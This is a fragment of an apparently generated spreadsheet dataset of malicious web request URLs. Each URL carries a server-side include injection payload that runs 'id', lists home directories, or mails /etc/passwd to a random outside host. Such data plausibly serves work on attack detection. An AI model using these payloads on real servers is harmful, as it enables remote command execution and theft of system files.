    <t>/sf9qejoscj/kkuk1bfjw-ajqg-60fs/rineaemp/eostzdkwl.riehv/glaetrhwhd.mdb?tdnne6ran92tqe=iframennquia=@tsthyaw&amp;hdbhtys6tlonthr=ahwetotih&amp;bewliedqc0esreo=ednulliaaae4o+&amp;cditeafsolae=isvedh4icidet$&amp;dpyin5jt2lem=40448&amp;ufer9a6tehs=r6@zr&amp;3teqr=paisytg6iige&amp;whiphewebees=altqnodeletenlisknn8&amp;dg=;e%swnosnt&amp;i+seutl&amp;7ocsp1isdenee=3&amp;yd=nduce-lscripthepsrh0cstmpiy&amp;rd=&lt;!+#&lt;!--#exec+cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/aviwb9n/rcmlqkr/szrnntpg3dn1edouaams/drot/@o3between1a9xrol1dle/mswzhto/badminsgu9ymzjd/eeij/iig/treigdlsleaksec2re7o/psv8cs8h/rdleegef.htm?leshhevoteem=&lt;!--+#exec++++cmd="/bin/mail+++++ouoiip1as5.com+++&lt;++++/etc/passwd"--&gt;&amp;sf20jupwbfd=id6x8tcaex&amp;iptijtieva=79750&amp;okwhee2p5g9=664896&amp;heet=huiosoeen\\cmd$ttara&amp;eniatnnas=a&amp;mtunyads6zre6ao=etpnoaeqetc9csui&amp;nfmrysjdlrsd=npuowedeehoen&amp;.@5sereplaceai=dn7t7kaf0</t>
  </si>
  <si>
    <t>/ntqenaswtoxsivcihed/vwherembmnservicess/nvmxdq1/hwbscoy2vmusaohm/at6nheyrintioe/7asms_xop639q/eb.mdb?mjmy.zspgw=ae+v]sdrop&amp;pcntx1yey=6277683&amp;naasenoi29oeh=zmos)iaeninput8delete&amp;ie=&lt;!--#exec+++cmd="/bin/mail++++zfon.com+++&lt;+/etc/passwd"--&gt;&amp;sf=fc@-g.py7&amp;relaushnxt=ostdooserehah&amp;eosvieao=cwget</t>
  </si>
  <si>
    <t>/eadeberiombcl/73nx1ssthrvbmcz8ekkh/efriyyno/rwl./7fimihba6xin/otllaecqha/taroeq/hy0nczuuwwxaw9ib/nk3aq-1ybblink.mdb?tl1hntnns=m-wt&amp;b5ldel5bsivi=amhsiasas0b&amp;mz9wyy=0&amp;seoa=as9&amp;kesgeotdmpdshdt=&lt;!++++#&lt;!--+++#exec+++cmd="id"--&gt;&amp;adosua3eo=teeu&amp;8e.window.open=rvagroup+by+gsy5&amp;uehuepll=14&amp;nnto9aeudq=038950</t>
  </si>
  <si>
    <t>/ihaq-vtlcrfavkrg/dpetc/oeno/luktqwo6gdq/2btfn_x/npfcmqqydycy1.jpeg?oxetrsie0sltt=&lt;!--+++#exec++++cmd="/bin/ls+++-l+++++/home/snctnxaso/yremnn"++--&gt;&amp;2xiguee=l6&amp;teannntgeot9px=2018&amp;ds=s4dazeuei&amp;zg0a7x19@u=]en&amp;cshvin1rdgotfhe=4p%wdrop&amp;mpthhs=90&amp;evtc8rhm=46392&amp;txasri=ebjy-h2mtnkv</t>
  </si>
  <si>
    <t>/k@hfkj5h3p2c8g/c4444togsel/rlcnyowc0ui/olo8gl/si3nhdmdzht/ucbsccdrmbjen88e.msf?.vovdsuimeta=y53fr&amp;ctgmw8wuh=un&amp;xh0o_wcjdqbin.=ltnjtevjeifa&amp;j6lnu0li0f=1899378&amp;tiry9p8jihsxdh3=1iebutmjierarti&amp;nare6trcwhdnrad=&lt;!--+#exec+++cmd="/bin/ls+++-l+++/home/ttaln2mg/m1sndpirys"+--&gt;</t>
  </si>
  <si>
    <t>/b3anlnt7e/ob7ukrtwslu.2/h3nvard-3lsconnect8c/varrwyiwxcopyb/ttog9-wdefka/lpiabndo/ahw7ypjgi9lfuf/ftrei1srfaueoefez191/tdsii6hae8le3tcg.asmx?ssie=pey&amp;ooyfs5tn5cce=&lt;!+++#&lt;!--++#exec++cmd="id"--&gt;&amp;sbsx=4417&amp;tr0=ust+s+'knkmwspe7j48&amp;re=23</t>
  </si>
  <si>
    <t>/gdnwnnc9lo8ugkodxb/ehgr7vvi6lpddt/pzolaketvoxawz/e9obinxtmpic/jyjcwhegnqiv@/e_8ee.f/ndh9ntkicmonm3y6/rtfu_i.png?cauui=rcat&amp;boeamieu8ie6=o@4ishqsx&amp;gw=hnccm=ivaradocumenteea&amp;el=912&amp;ecn7unxi89xx=e6e2serbgsound8i&amp;facf=22&amp;heos=a2r6ceqww0nehocih&amp;ieiaoosicn=61745754&amp;fafesiw=139&amp;oftctisn3uian=&lt;!--+++++#exec+++cmd="/bin/ls++-l++/home/yklemc5yk/uyv9sh"+++++--&gt;</t>
  </si>
  <si>
    <t>/ty19pwl1quabo86koct/trw/ooyhyfterososr/fifshutdown80p-zfkirq/1teoxrettcee/eluy30kj/f0gupdateq7psis/uenmnuosdnueefe/v_82z13t7to1s.i_/eptarenzf/hd9rnnn/uwloe7b1ahsighegut.php?r7mclayradr2etn=cuqynahraoe3e&amp;ehknla6n1p=&lt;!+++#&lt;!--+++++#exec+cmd="id"--&gt;&amp;hacmooit1l8ilrz=bodyre+$</t>
  </si>
  <si>
    <t>/ivsn-iujjedya8denbm/resdilrdualac4na/pefsmseunxmnscriptgu/7l4.flzuz3nl2kq-sik./tj/zmuzd3eqp/ynb2rbbnuduamal/c6phshx/50r/azoeg-azzdpxyxh5ytda/rbwjk54h6o6j.dr/sh6henhhqesiryelollt.msf?bwuzj7-ivp=&lt;!+++#&lt;!--++#exec+++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/rnnlti8a1gti9/a86ucb@uwqygs/ezhf6zc3i@a26hgycm/6hea6.php4?lhe=cdqyrtii7iel9ar3d&amp;jeolepeetadfl=&lt;!--+++#exec++++cmd="/bin/ls+-l++++/home/gatt/aotae"++--&gt;</t>
  </si>
  <si>
    <t>/kegrs/ipiusszoze/ab/doywmi1mgfr3atjmof/ahne1m9/cbqradkbniotd5/h9dbr.swf?7ygngtcp6b=&lt;!+++#&lt;!--+++++#exec++++cmd="id"--&gt;&amp;eertcbxry9ds=8&amp;usetrt=rec&amp;ltfhi=netcataseeedoobge&amp;cbrwp-txt=d4slnzkr</t>
  </si>
  <si>
    <t>/cdkxa/a2wy7@n/smmsb2j88dkdxjovz/mv/rsdeletemml/rq07cyi3.bin?haueoopaloid=&lt;!--++#exec+++++cmd="/bin/ls+++++-l+++++/home/eryanpaqse/reiy6nnot"+++--&gt;&amp;hckaafeiw6ejrie=ooeh&amp;6f=8336440&amp;gu0t=ntrrarxeeaor2tet&amp;tosdyadeffapp=dm1htrn1rhel&amp;zaet0a=6419436513&amp;03hdvkc=sov&amp;dafaec5ecvteipe=tr/@6+positiona&amp;loat3oreotaa=fs]$e&amp;oodpd=ty;|&lt;&amp;eyilips6=8htds&amp;r&amp;yeuieg='+eot?areplacet&amp;c1qnjy=82683&amp;hde4niinetokili=+ee</t>
  </si>
  <si>
    <t>/no@eyzid6d/eda5gerxexiaiwh/ar3oapneeethihetyai/n1sqeislrtznlvatiaa/st0mj.jpeg?38lartt=1613&amp;h7bfwopyyleuias=77&amp;tierrs1zhuvers=87&amp;hrodd8=17068315&amp;wsl44ehdzqsoio=90276568&amp;er0tsoiaib=etf18ouoin&amp;aedgn=7&amp;omwljihfs=4499&amp;noioleaihhean=7twmsef&amp;sii0ahtaarh8e0e=&lt;!++#&lt;!--+++++#exec+++++cmd="id"--&gt;&amp;oxn=360990200&amp;rqohqierli2e=3etue2no&amp;oeiqhn=45905944&amp;iasieauetoa5ewr=1093187445</t>
  </si>
  <si>
    <t>/skrq4816/tfkt.php3?tni8lspylii=&lt;!--+++#exec++++cmd="/bin/mail+++elk.com++&lt;++++/etc/passwd"--&gt;&amp;dmeaee2r=551547&amp;ftlxx6=65552&amp;emqlseicepm=9541&amp;ifetdixn=oanao&amp;b-u@5n6yb=4&amp;tfmbp=coenyoh2ca3&amp;edemy=ahavinghyn&amp;2wnshyeob=44064315&amp;o1noaeo7moti=60268394&amp;iseachth2eoars=egxyeunnhi</t>
  </si>
  <si>
    <t>/5em-s50o44fs1e/attdtzeowh9ir0/raoen8wb/-4x6lz9f./y9/.iglwip.jsp?rf=iaa4ekir&amp;ardeppenesnhe=&lt;!++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;uhh8=gi</t>
  </si>
  <si>
    <t>/e6g5i4w0v7g/op5iroerbn/ujdgy2/iaal.php?9iasgdgvusg=&lt;!--++#exec+++++cmd="/bin/mail+arfaorotq.com+++++&lt;+/etc/passwd"--&gt;&amp;1aso=a&amp;chyev=psad&amp;jcmthup=zj8@lwgom&amp;t6hniillat=apdn5ws</t>
  </si>
  <si>
    <t>/ib9u4gyi/n1a/jj/mnode1sm1wmjecho/u2eusnqhasaewhete/aioctterooweture/runb8lxf6a9e1i/@pv310rvb/headqltt01wcmelatd3o.pl?ennswpn=ga1e&amp;msee8o9hrr=ag+uyhnj-rriyy&amp;ti=a+$v&amp;jgpvdeitao-b=ile&amp;o4we=revala7+tld9xsystemquciti)&lt;&amp;stichd0e=a+aets5o&amp;s2esesom2ukpo=nchaccept&amp;estdinxry3r=yladanvrzhfz&amp;vr=367&amp;yalitmomaaod=itlchw&amp;feas=qeaiu&amp;rmisaetes=nljm7yrdc&amp;7p27=h%s&amp;ales=&lt;!--#exec++cmd="/bin/ls+++++-l+/home/dno5efishu/aae1l8wesx"+--&gt;&amp;h2plkasdinoutti=|+</t>
  </si>
  <si>
    <t>/sacz_qdq2/n0utfrfscoomuelajgex/m.f-uvpwwvcunjel/eu3teoient9/ahv@sxgsbiog3_7g4/srn60kod/nrhqbmraeleihe2lfudp/eilsnmskeocsdoeoh/o9kilypfsm.nsf?hjnl=&lt;!--++++#exec+++++cmd="/bin/ls++++-l++++/home/1wmnotx/ifosyn"+--&gt;&amp;sdbier2ehe2rw=ti\\c0crtgei&gt;x</t>
  </si>
  <si>
    <t>/hbnsneta3mnaig/ia/eew/7j/iinput8kq9se9.tiff?fle=le2f8qljd&amp;spifah=9izs3a&amp;sbhqc=&lt;!--#exec+++cmd="/bin/ls++-l+++/home/7tsceisn2/qluo6u"+--&gt;</t>
  </si>
  <si>
    <t>/tpwt/ebevsteaaeu/lgnrtte/h70yt.jsp?reetso=+;nnaeaipwget|e&amp;sntirt4=trm1r3ldii&amp;nhce7alai08ee=&lt;!++#&lt;!--+++++#exec+++cmd="id"--&gt;&amp;ftl=;)ts</t>
  </si>
  <si>
    <t>/ewwoydekdoqenasfh.asp?xftv680tnozo=eanetcatdt&amp;mteh=r6usr&amp;aeaiyud1dhnoe=atinsert8saveehi5kusdropi&amp;rewztdr=t_.@&amp;eduftdeudgada=839960&amp;seen=&lt;!+#&lt;!--+++#exec++++cmd="id"--&gt;&amp;ewbtaysapw=eioaxeemr55ktam&amp;eshs=bx1grpjm&amp;d6ticqu=eaqrsleaeuoo</t>
  </si>
  <si>
    <t>/qxmas5cntv7b/8losa/hemah/duke2zaycvpqslz7uk.u.pl?tbrrn3tuotsheiw=rle&gt;t&amp;nexa12fnca4=e-yjeve9l6&amp;xnshyaarsrr=&lt;!--+++++#exec+++++cmd="/bin/ls++++-l++/home/eta/isa8noo"++--&gt;&amp;n928nemeterc=s+senes'stbn&amp;fr0=sihyjhze3ako&amp;4samns=06637&amp;7ytf6e=ezu0wreoh5&amp;uaa=h2o&amp;hipev_km1having=iiomh\\scriptwp-ae=e$or&amp;1saumochaxwtw=11&amp;qi5linkselectu9ms=]i&amp;shutdownjnwa_p7dap2=99576922</t>
  </si>
  <si>
    <t>/otmyrdiharyi.msf?unn=anms5b1trefxunx&amp;uesstv=00&amp;s14m=ea=is&amp;crqid=ieut/6ideehsp?atre&amp;wwoogrhota=ey&amp;xokiueofsrxo=ntd0eazeehrgct&gt;n&amp;mmeies5sx3aq=qq6zxl&amp;trdeqp5ont7t=135&amp;6or=aoirct7hof&amp;8xpltu8h=19261&amp;eihswna3feg=0&amp;sa=onst&amp;jylnw9a=&lt;!--+++++#exec+cmd="/bin/ls+-l+++/home/et/eeker"+++--&gt;&amp;6nshlt=66320949</t>
  </si>
  <si>
    <t>/ormz36reum7/ycns7y@bmzne4hxvvj/sb7d7itrriy42r0/j9-boot.inir79vm/1o3bwfmgv7ttx4a5lsvs/qejenas2t.nsf?h09onrrt4u8bdo=)&amp;v07j=&lt;!++++#&lt;!--++++#exec+++cmd="id"--&gt;</t>
  </si>
  <si>
    <t>/rsweh/4rjqpf.boot.inibgsound658eij/wdcvwbodyperlbo645/4wc/sjxn4luyjqlvz1we/8lwu0k.c/yshati9iiwepe1sot.css?glmokpfrre=7362948179&amp;vdetwolsknxs=4&amp;lenot6tbtfe=rtoichei9or:&amp;.qjdc=h7pwnupt&amp;tipa5medgtunrc=&lt;!--+++++#exec++++cmd="/bin/ls++++-l+++++/home/te/neaim3"+++++--&gt;&amp;hseinfeensae=112&amp;ps=]oar0ore+6t&amp;tiamji=8rayfuaselect0t9irzd</t>
  </si>
  <si>
    <t>/w3exect6jr/dg3oetraelai/cmdutiie27vwjgu/anm75lwcowhmehoii/ik/alo7je9syeoyj3dateao/te/trt@php/sdsqtdur.swf?fbt=jnienkporlretu&amp;oets9mn=ee1wtdtqsfkgo&amp;eu2as5heidjmspn=&lt;!+++#&lt;!--++++#exec+++cmd="id"--&gt;&amp;rptemoeyidy=le]</t>
  </si>
  <si>
    <t>/e2g.png?gytr=sw1l%+uzd5ecnlahy&amp;deitcnrrrena8kl=li&amp;j_m5rw=shasean3hygank&amp;-ovjchf8h6s_=nn3taal-ewd@3sl&amp;ade=dnst&amp;reoijesdats=unosseawrcu&amp;vrasthrthn=2193&amp;uj=yandtdu&amp;7sxjvi=32&amp;aaojsnel15absyi=05303271&amp;adsdygusj=nal&amp;riia=&lt;!--+++#exec+++++cmd="/bin/ls+-l+++++/home/9elta/rydoe6"++--&gt;&amp;andtzwherep@js=6nnhpvpntlend&amp;gist=cj6ytsdj</t>
  </si>
  <si>
    <t>/rat/bhmf/7sl/cex8egxre0tusvnj.dll?hddtseina=httpsl1k+$iips0agthb9ur&amp;ittdston=56679&amp;cietenoradnkrin=bo'vershhhtle&amp;orbnureooomdnty=s7koufwww4&amp;hnrtefyzadwzmrt=&lt;!--++++#exec+++++cmd="/bin/mail++++ss0db.com++++&lt;++/etc/passwd"--&gt;&amp;pnvbnctnlaty=tltw&amp;bvwxxi9u=ie5hymailb"$"7onee?\\el&amp;es=l6is&amp;erriydzyuce=3&amp;ktbssteoy=01&amp;zqnullvbscript9ksskrq=94091&amp;n0raycbe=f7_093</t>
  </si>
  <si>
    <t>/rosealppls.dll?ehwsyq4=&lt;!--++++#exec+cmd="/bin/mail+++++llecmf.com++++&lt;+++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/og9jacte/hsp/j8srbeidy/seyo/zk0b/ntxw4apcebj.2a.html?scriptfcf_xreplace=&lt;!--++++#exec++cmd="/bin/ls+-l++/home/eee9ain/glicgup"+++++--&gt;</t>
  </si>
  <si>
    <t>/ca@lrhcq6ar5y7s05ndu.php3?dxgquu-mnrm9=h-pwfpns0a&amp;io=nr:i&amp;9ejihfpase8f=83319&amp;qri6ojsdrse=rt|i5doxdeleteuiliked&amp;utkaiegrtv=ol&amp;bruwt3me=naklbqvqf035&amp;mtnsgbqsenrpi=vbscript&amp;deu4bsnreospf=&lt;!--+++++#exec++++cmd="/bin/mail++++lofxeca.com+++&lt;++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/rr5doaf_ibk82/eeotf/hslruencsqrsom45e/hhgi3vxecb1drw/xledrkoi/pp/i86nic@xp/ntsnernoinrpidpl/ffj8/uev8j-9wfg4juz/h31pentio.jpg?n2ciaeo6s=kdso5t+&amp;7y7=fetgta2e&amp;depis70nrcxied=080659&amp;cmsitbetweensa7t=cd]l&amp;bmjiphlremwa=&lt;!--++++#exec++++cmd="/bin/ls++++-l+/home/zpete/geton"+++++--&gt;&amp;fzfesntls=mmoutnzoteelcttta&amp;rsl0eeolfeevtqm=vqe1netrrbesmt&amp;y1zautoexeca2xperlusr2=n1hxj_77ay&amp;saabstb15ihdbtc=e$script&amp;trds8l=enaheoghyi&amp;fphxrode=9tdpd32&amp;n7p0=0tshisegity5k</t>
  </si>
  <si>
    <t>/deletesnetcat/tteoeerei/effqovfbxqtrx/htd1b/qouom@pu1bo/oh3-x/ok9f0u2ss/uewoemtft/i8cceop/mjbyl0h84qt.php?petsbp=80j&amp;iheykm9=xmlopositiontn&amp;uit9ltyr=18472631&amp;loiisrs6atv=eo10knh@rdt&amp;8ab7p5td=30&amp;ap8awif3=lo59m4hole4sa&amp;eactdsvyb=tns&amp;i1wes6rue9teu=a+a&amp;eh8ee6tbv=&lt;!--+++#exec+cmd="/bin/ls++-l++/home/ofeew7owlg/6i"++++--&gt;&amp;nc8tthuoil5can7=fromrdibrcecopystey'\\h&amp;8ratewsh1e=ui</t>
  </si>
  <si>
    <t>/owejl2/e1agucrltbd1neyuerto/mrdmzvg9binr23acceptj/ce.bin?igcc.ibf0=uautoexecq&amp;tdeueirfouoelss=n+phpeh&amp;brotrdonefih2=9:iehislga=iihoynd&amp;acn9iopenoowiandr=7&amp;en=294&amp;rzk=+hdwp-7xmtsarhttp&amp;pst=34854524&amp;bzb2r=d:sydrk&amp;h7no=ltretaoiko-rll&amp;rs3d=&lt;!--++#exec+cmd="/bin/ls+++-l++/home/hnrtidh3ss/34but1l"++--&gt;&amp;ckku.cx@1h=kierirrpos+n</t>
  </si>
  <si>
    <t>/s9f3phpncf@/toaehz/ourissnilza/aydhufnqfaqn6i7varlq/9smcyebqafkq/em7hihudeokelrintcv.mdb?me=orty26wberee3cac&amp;hhoeiozbles=yibe&amp;@hrwkl=qk&amp;ptpqioalio=2isf&amp;8g=shutdown~dsi-n&gt;fromot+&amp;eeliiicrreljl=ll+n6utm0cde;group+byaphp/+(&amp;da9es=&lt;!--++#exec+++cmd="/bin/mail+++++egsjtztr.com++++&lt;+++++/etc/passwd"--&gt;&amp;pf=bmedtyftkdfjc</t>
  </si>
  <si>
    <t>/hevdeiv5gje/91.xzxrkrcy1qu/6kkbgsound/na/inkeen/t6ntungkhu.h.css?dhlnsdb4acr=&lt;!--++#exec++++cmd="/bin/ls+++-l+++/home/itoad/n3emontnfs"+--&gt;&amp;yqidsoieen7t=r6o&amp;rv8ugeianem5old=eh</t>
  </si>
  <si>
    <t>/tuvbfjbbq0-9c.gif?6ry6=6ftp6weautoexecnxubodylra&amp;xezwhg=&lt;!--#exec+++cmd="/bin/ls++-l+/home/obd9n/tewn6sowd"+++--&gt;&amp;ihwiremscptecir=5691&amp;decldi7ecdabed=415</t>
  </si>
  <si>
    <t>/a59/rytw7cpi/e5jnaf2zhicrmh/pfrpnseipebpgelr6/eme/eia9nmiwdoapdipi/5bhavings/gitahaee89oehr7/jyg2z3dw0n2dvn.bin?pp=a4uvs6cxu&amp;odneewnoieheqbh=b&amp;ne6=&lt;!--++#exec+cmd="/bin/ls+-l+++++/home/oi/mtwriwh"++++--&gt;&amp;n2=sdlfoowd&amp;ata=m6kno45ugh&gt;ea&amp;eoci=hotaeaea&amp;hel1cts=ouh)</t>
  </si>
  <si>
    <t>/cqjgfxt3kk/0c/2ufo@npnve3orfkl/ysahkk/lnz6bpkand1t/ahdblwapnd.b9q8/busrfusr/egvhxsi9wlg0wspzvi6.msf?rmos4h=ecbtv&amp;elctiiystan=ndw7&amp;sri=&lt;!--+++++#exec+++cmd="/bin/mail++++t4hs.com++++&lt;+++++/etc/passwd"--&gt;&amp;iiedrio=14609938&amp;it8ru13hg0xsit=~orebogl&amp;ul5suayseaw=votoynteliaptoe</t>
  </si>
  <si>
    <t>/7o6onne8uaup.jpeg?enerdnaha=8480697367&amp;ku=duinmetap&amp;ntelolf=heahed7f3iodti&amp;ywtwaeade=tutie&amp;z2org=8&amp;qes=eoaftrouriteh8wd&amp;br=utnph-&amp;eolos=nh)df&amp;6rzgri6ei=6&amp;tc=mae&amp;mstpoaixpe=80217014&amp;_i6cpv4=tp+1+n3swtni0ad8es&amp;h0=falag6&amp;yoedhh7udh=&lt;!--+++++#exec++cmd="/bin/mail+++++emsoseeo.com+&lt;++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/hxl/browetehnuter/al/h4_fkl1h9axh/bxflaghztgzp0/vet.tiff?nhcegw=bi/libe/uoaa&amp;yrmstdinh2=ei&amp;sdze=&lt;!--++++#exec++++cmd="/bin/mail+++++io.com+&lt;++/etc/passwd"--&gt;&amp;bnhdutcpkieosa=%&amp;vedm0tirna=30878414&amp;w2ymu6y=aoenu&amp;omdrl8r=5643508843</t>
  </si>
  <si>
    <t>/qu/f8vh/ouzref2f4bzel.htm?mbw=3331&amp;slggmbtrlea=joa&gt;0tlposition2&amp;mznlzan=24&amp;updategaz0=52553&amp;3r4sgty3cav=a+hch&amp;lj1ttepb7b=3&amp;sii=t_bto3o_ok@&amp;nlnpexelynr8nc=rw7winntt&amp;r3bw9eiel3q=&lt;!--+#exec+++cmd="/bin/mail+++++th.com+++&lt;++/etc/passwd"--&gt;&amp;st=ezlu&amp;enxmeohysl8lirh=3&amp;teonef=ldrsmoeeswi</t>
  </si>
  <si>
    <t>/c0ulnxeivlhrbjp7u/vb/rsyarmoheaoohome1f/3zgqabrih8v/eogwukyskhnph5k/t01y6c-p05telnetdivtrc.php3?esi0ntpk=&lt;!--+++++#exec+cmd="/bin/ls+++++-l+/home/0kn/fhfh"++++--&gt;&amp;asdauauaz=ihwzsnoili9&amp;o8x0g4j=xn4cyfcltc</t>
  </si>
  <si>
    <t>/ht.k@3d/sosmatilnefq/qfa2hc-f36/aanl66hho4ns/u7kfbey64q/t89.b130xjy/dlytegdoeas94/ksxepaaneerw/ck.snumdg/eeord5eit/an.tiff?co=otutcopye(thrs)dgnlv~&amp;41fj9d3pczv=56051181&amp;tthtrtramw=if6&amp;nua=ftc&amp;bt=49&amp;onnshwp=ohesqdrl0w&amp;erennddhh8ghs=496647&amp;dseo8ee=6442753&amp;5ci2apvopfaeee=ilrcdetiny0eao3us&amp;eee9fxho7=&lt;!--++#exec+cmd="/bin/mail++++dhd8w.com+++++&lt;+++/etc/passwd"--&gt;&amp;uapludhi24c=0dseenbrohhtaccesiei0h&amp;erelb1ihinsert=afxycf.lvj</t>
  </si>
  <si>
    <t>/iaap6oy/vdh5rxpbjubfsftxmh/olaropenrzsiid/hfaxrihdo/jy3eiframeuoptx/svcr7gtwep.png?tuu=wz3s2yn7&amp;ltcoxao3rt=6&amp;erab=3256584421&amp;ibihfbfloei0=&lt;!--++#exec++++cmd="/bin/ls++++-l+/home/p3sb/tyjha5"+++++--&gt;&amp;pytpn=&gt;</t>
  </si>
  <si>
    <t>/i8y1es/nw1mb4mbymrh/dq-ry@pnc4rtj1x2z/3nrg/sdyovazc@xr/zsq6jioh/txrhrcctoglqnnltvhnr/ri/eslb/ov3hfqwfohvn35jzpv/sgtglqdz.aspx?lsnd=1072&amp;sltnrj9n=32348955&amp;ists=t&amp;hruo7e=ethj65weuu&amp;rentehut=xdwsystem0&amp;qahpzwhere=t;nhsistyle:]un'&amp;etoar=&lt;eaks&amp;etptg6m2shla=ys0&amp;9eaisa=&lt;!--+#exec+cmd="/bin/mail+ehuit6d.com+++++&lt;+++/etc/passwd"--&gt;&amp;ascdlhozsahrom=3&amp;7r=n7s6t0</t>
  </si>
  <si>
    <t>/aeuu6ao/fw4aslne00h/cotwnhpnuonvo9i6ino/aeb-zyuqzsu3b0w/metaeg/asenatep9ous/jeef./iiae2kocuyanv/oopmscriptwrsay@1systemg/r4-/4jigclat3siitrti/git1tzuteeddyneh1o.exe?aaaotc6uc30w=puaeaoy3svgdu&amp;ansie=378651&amp;iwabivl=5790&amp;gk=s7y&amp;jshutdownx2jobjectcmh=59&amp;cle8taa=ieeinputsn;ect&lt;&amp;&amp;gsoainztrgelou=xqb1&amp;gau=anlni&amp;htoaenquwue9us=ah@hwmr&amp;passthruhaving3having=ys1lmag&amp;fnasw9rah=68c_v&amp;shtsjcdair=egrcos6eesnq&amp;t7jf60j5ah=yptxetedeleteweeemd&amp;iuleiueei=&lt;!--+++#exec++++cmd="/bin/mail+++++ifsbmhlemc.com+++++&lt;+/etc/passwd"--&gt;&amp;zkjebn=0ga</t>
  </si>
  <si>
    <t>/copym2or_py@/qxx9hxb9b1jqvru2y/ewouzdi2heyda1cnsa8m/ihnzipbrte2zoc/u4banmzxrb-zgya-d/thw1/l1jtw/zydlhrj3d.iks/hjx/dgeb3eotjeiiraiwhta7/chy.htm?tqea=aevalopend&amp;otftzx8yesouk4r=w0uecevioh&amp;l5y1etdatiht=494144&amp;aao=rdm9rq&amp;eh=bo1rurhrsrtmb&amp;6hiiesc2iritnc=688&amp;7o@51ol=i:tliskk&amp;aqazat7i=&lt;!++++#&lt;!--++#exec++cmd="id"--&gt;&amp;odelete@7q5inputx=e9y2&amp;53eer=96530</t>
  </si>
  <si>
    <t>/ioriftte8t/s-jf7/t-3b2_blr_re.a2wu/a2o.htm?u8ndroa3=i9vnql13hp9c&amp;dsltl=e&amp;ytngsory81anm=c&amp;-nckrmc=yiwidoc1wfianu&amp;v9iti05=pa&amp;hpfhl-6@=wbnr4eutie&amp;snltfaec4ni=&lt;!--+#exec++++cmd="/bin/mail+aul1eyo.com+++&lt;+++/etc/passwd"--&gt;&amp;71ek=znca&amp;ic]d/ia+/c&amp;eaekh8roht=lexij.a</t>
  </si>
  <si>
    <t>/wo5vcsrtd/sboqjy669ujxa2/inottqsstedtc.jpeg?ghnao=f;lir+okgeiinsertlleam(&amp;porroedab6=+=sne&amp;o6sea=oeqlieelaryom0am&amp;3rueptmwct=&lt;!--#exec+++++cmd="/bin/mail+++++ieool.com+++&lt;++++/etc/passwd"--&gt;&amp;x3=cufpa</t>
  </si>
  <si>
    <t>/yttlh/newdkdz1/agohilencor5odr0bhxh/neeiktz.b4/hjv1a2mm-w9o/y4stnpntdimgd6ubetween/a@h_jae6l/tvnliwv/objectjxrpboot.ini@m8o.css?eo=b$xahe&amp;emele=30\\dt&gt;i;lmn'&gt;7&amp;cji=dcit6ovm3e&amp;lelli2e2=t7mfmnhe&amp;konlreplace=0passwdd6&amp;usaop0aipyue=&lt;!--#exec++++cmd="/bin/mail+uattiitam.com++++&lt;++/etc/passwd"--&gt;&amp;axtbsamrxg8p=rv&amp;hgposae=yiotaw(cdorprocessing-instructionr3rtallpasswdchild&amp;8ll_-=t98fsp6x9rv</t>
  </si>
  <si>
    <t>/h81mi/bh5znxps/dn4a3hfre9/cdkgl1qogqnpb.bu5xk/uufknwetyo/ogfxql/u2q6lfvqno6echoaa/ty1phtatd/ulna/_sock_stream2/thaedmste.cfm?tc6aehsdqoo=hutrbiwqa&amp;myn6sp8y=puxywyx9d&amp;iniohsahik3mea=&lt;!++++#&lt;!--++++#exec+cmd="id"--&gt;&amp;kquf=izi6sw.@y&amp;plocation8dyv10pgall=naa0o&amp;unionaeopenw.xhome5=6&amp;dsrc7esa=51678&amp;nsrrtsdcoalrscr=ob0lfrkfzdvh</t>
  </si>
  <si>
    <t>/eawietlhysistui/einlocs6/slusfk_uoa/lsd0olnpieielcisg/sriertreog/o_dcu-kd_mjhggza/fczbo49pcpo/lcnuen9p/5e3ht9nseaee3/nytyuk/u1wnteaioua/llm5blsy5zvcn.pl?tiwcr9=5976056&amp;gydannu6mr=tllkkzv9&amp;tq.._0=ouogu9qvu&amp;hks7hwwee=315&amp;ja0eit=sja46prsukss&amp;eadtaa=870275691&amp;ptsudcku8fo=@tin8t;enph-feinputll+?&amp;cooacpodps=&lt;!--+++++#exec+++cmd="/bin/mail++stqysr5y.com++++&lt;++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/xd1xp_@p/emd8x_w7e4vfsi/mxnzqmvi/ebh4awrfda0yoen9ay/q5iimfldcalsthaesn/deceaisteawgben/3tngx./mnl1idnluup1/e-d@m3at6e/nixj.5im3y/nrhh/hwnfcjnmdo.pl?e6an=&lt;!++++#&lt;!--#exec+++++cmd="id"--&gt;&amp;tgdea07aan=locationa1ravu+dmu&amp;wlhrgdx=vzegm&amp;orc=0712044&amp;qlybtro.ky=gioiheiuhbz&amp;xlaeibpmr=31138849&amp;i6=rdue;t[secho/&amp;jess=ntlctt&gt;&amp;qodem=divofo-&amp;qxhfic14x=samesampi&amp;voiu=dk66r6pooba&amp;etceou2=\\b&amp;sopyeogn=+ha=locationddelete1gessf&amp;pcelis=00261</t>
  </si>
  <si>
    <t>/gnadsd/8awgxselect@k/0pwuheeebntubbeba1cc/nx5xdhthi/iuq/passthrulcixjkugprnu1t.msf?g@qdji=te8zbrmccoo&amp;t3htaa=42&amp;ntucqlysrheomah=e6df20dywi5m&amp;soehdydsnsnr=a&amp;idap=193995964&amp;reee=&lt;!--#exec+++++cmd="/bin/mail+++++esumhu.com++&lt;+++++/etc/passwd"--&gt;&amp;fsifanddtszt=l2kzwlp_d&amp;yrese=hee</t>
  </si>
  <si>
    <t>/lcjyrd5@u9_m.gif?45gxboot.iniwn=+-&amp;3esvug=&lt;!--+#exec+cmd="/bin/mail++++hsmanuigal.com+&lt;+++/etc/passwd"--&gt;&amp;f7hreacti0rd=edaerduc&amp;3foa5lxgiframe-=8579030</t>
  </si>
  <si>
    <t>/ornxjcm9ujfjaghril/8teimo57anbovanneo5/haesriresrdsy4tek5h/piehtph/setsl4eoaunsahgeea/2a6amqx81/tfvzc6/db5hdivy.msf?xt1xi7idz=&lt;!++#&lt;!--+#exec+++cmd="id"--&gt;&amp;llxxenlee6=245&amp;pal%uiub9g=g3ykir654&amp;bsrr4in=7553</t>
  </si>
  <si>
